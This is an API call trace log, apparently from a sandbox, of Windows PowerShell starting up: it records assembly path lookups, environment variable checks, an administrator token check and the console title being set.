	[0387.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.541] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0387.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.541] CoTaskMemFree (pv=0x1ed820) 
	[0389.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0389.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0390.615] CoTaskMemAlloc (cb=0x104) returned 0x1ed930
	[0390.615] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.615] CoTaskMemFree (pv=0x1ed930) 
	[0390.616] CoTaskMemAlloc (cb=0x104) returned 0x1ed930
	[0390.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.616] CoTaskMemFree (pv=0x1ed930) 
	[0391.102] CoTaskMemAlloc (cb=0x104) returned 0x1ed930
	[0391.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.103] CoTaskMemFree (pv=0x1ed930) 
	[0391.104] CoTaskMemAlloc (cb=0x104) returned 0x1ed930
	[0391.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.104] CoTaskMemFree (pv=0x1ed930) 
	[0391.105] CoTaskMemAlloc (cb=0x104) returned 0x1ed930
	[0391.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.105] CoTaskMemFree (pv=0x1ed930) 
	[0392.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0392.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0392.760] CoTaskMemAlloc (cb=0x104) returned 0x1ed930
	[0392.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0392.760] CoTaskMemFree (pv=0x1ed930) 
	[0392.763] CoTaskMemAlloc (cb=0x104) returned 0x1ed930
	[0392.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0392.763] CoTaskMemFree (pv=0x1ed930) 
	[0393.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0393.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0396.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0396.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0396.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0397.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0397.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0398.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0398.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0398.665] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0398.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.665] CoTaskMemFree (pv=0x1edb50) 
	[0398.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0399.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0399.125] SetErrorMode (uMode=0x1) returned 0x1
	[0399.125] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd8a0 | out: lpFileInformation=0xcd8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0399.125] SetErrorMode (uMode=0x1) returned 0x1
	[0400.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.463] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0400.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.463] CoTaskMemFree (pv=0x1edb50) 
	[0400.466] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0400.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.466] CoTaskMemFree (pv=0x1edb50) 
	[0400.466] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0400.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.467] CoTaskMemFree (pv=0x1edb50) 
	[0400.469] CoCreateGuid (in: pguid=0xcdc68 | out: pguid=0xcdc68*(Data1=0xb4a318d8, Data2=0xd08d, Data3=0x45b1, Data4=([0]=0x92, [1]=0x5e, [2]=0x81, [3]=0x0, [4]=0xb8, [5]=0x94, [6]=0xac, [7]=0x4b))) returned 0x0
	[0400.472] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0400.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.473] CoTaskMemFree (pv=0x1edb50) 
	[0400.476] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0400.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.476] CoTaskMemFree (pv=0x1edb50) 
	[0400.478] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0400.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.478] CoTaskMemFree (pv=0x1edb50) 
	[0400.485] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0400.878] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd910 | out: lpConsoleScreenBufferInfo=0xcd910) returned 1
	[0400.884] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0400.884] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd910 | out: lpConsoleScreenBufferInfo=0xcd910) returned 1
	[0400.886] GetVersionExW (in: lpVersionInformation=0xcd8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0400.888] GetCurrentProcess () returned 0xffffffffffffffff
	[0400.889] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd938 | out: TokenHandle=0xcd938*=0x318) returned 1
	[0400.917] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd858 | out: TokenInformation=0x0, ReturnLength=0xcd858) returned 0
	[0400.918] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x157290
	[0400.918] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x157290, TokenInformationLength=0x4, ReturnLength=0xcd858 | out: TokenInformation=0x157290, ReturnLength=0xcd858) returned 1
	[0400.919] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd9b8 | out: phNewToken=0xcd9b8*=0x314) returned 1
	[0400.919] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd858 | out: TokenInformation=0x0, ReturnLength=0xcd858) returned 0
	[0400.919] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1572c0
	[0400.919] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x1572c0, TokenInformationLength=0x4, ReturnLength=0xcd858 | out: TokenInformation=0x1572c0, ReturnLength=0xcd858) returned 1
	[0400.920] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2d33000*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcd9c8 | out: IsMember=0xcd9c8) returned 1
	[0400.920] CloseHandle (hObject=0x314) returned 1
	[0400.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.325] CoTaskMemAlloc (cb=0x804) returned 0x1b770040
	[0401.325] GetConsoleTitleW (in: lpConsoleTitle=0x1b770040, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0401.326] CoTaskMemFree (pv=0x1b770040) 
	[0401.770] CoTaskMemAlloc (cb=0x804) returned 0x1b770a80
	[0401.770] GetConsoleTitleW (in: lpConsoleTitle=0x1b770a80, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0401.770] CoTaskMemFree (pv=0x1b770a80) 
	[0401.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.773] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0401.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
